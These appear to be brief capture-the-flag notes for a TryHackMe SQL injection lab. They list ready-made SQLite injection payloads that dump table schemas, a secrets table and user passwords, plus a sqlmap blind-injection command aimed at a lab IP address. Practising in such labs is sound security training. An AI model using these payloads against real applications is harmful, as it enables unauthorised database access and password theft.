# SQL Injection Lab (THM)
### Introduction to SQL Injection: Part 1







![Uploading file..._xv7i0qol0]()







### Introduction to SQL Injection: Part 2

```',nickName=(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'),email='```

```',nickName=(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='secrets'),email='```

```',nickName=(SELECT group_concat(id || "," || author || "," || secret || ":") from secrets),email='```

### Vulnerable Startup: Broken Authentication



### Vulnerable Startup: Broken Authentication 2
```' UNION SELECT 1,group_concat(password) FROM users-- -```




### Vulnerable Startup: Broken Authentication 3 (Blind Injection)
**sqlmap -u http://10.10.151.38:5000/challenge3/login --data="username=admin&password=admin" --level=5 --risk=3 --dbms=sqlite --technique=b -D SQLite_masterdb -T users --dump**



### Vulnerable Startup: Vulnerable Notes
**' union select 1,group_concat(password) from users'**



### Vulnerable Startup: Change Password


### Vulnerable Startup: Book Title


### Vulnerable Startup: Book Title 2
**' UNION SELECT '-1''UNION SELECT 1,2,3,group_concat(password) FROM users-- -**

